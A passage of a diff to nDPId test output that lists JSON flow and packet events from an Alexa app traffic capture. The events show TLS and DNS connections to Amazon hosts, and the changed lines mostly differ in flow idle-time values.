{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1490976100811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100811,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BwBAAEAGDSusECrYNu8YuoUaAbt\/SWKxAAAAAKAC\/\/9R9gAAAgQFtAQCCAoA9mWxAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100859,"flow_last_seen":1490976100859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100859,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1490976100859,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100859,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8OO5AAEAGq6asECrYNudIWKNhAbuICV1bAAAAAKAC\/\/8AqwAAAgQFtAQCCAoA9mW1AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1490976100998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976100998,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw6qtAAOcGgoo27xi6rBAq2AG7hRpDnUSYf0lisnASH\/5McwAAAgQFtAEDAwY="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1490976107217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1490976107217,"pkt":"AMDKkaPvePiC0\/vCCABFAABFWlxAAEARM1KsECrYrBAqATiMADUAMXUjXSIBAAABAAAAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAE="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1490976107359,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976107359,"pkt":"ePiC0\/vCAMDKkaPvCABFAABV3nRAAEARrymsECoBrBAq2AA1OIwAQbpsXSKBgAABAAEAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AAQ27x39"} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87ItAAEAGIlysECrYNu8d\/Z+WAbsjoITLAAAAAKAC\/\/9pNwAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107366,"flow_last_seen":1490976107366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107366,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1490976107366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107366,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY5AAEAGRVmsECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8HXAAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107455,"flow_last_seen":1490976107455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107455,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="} 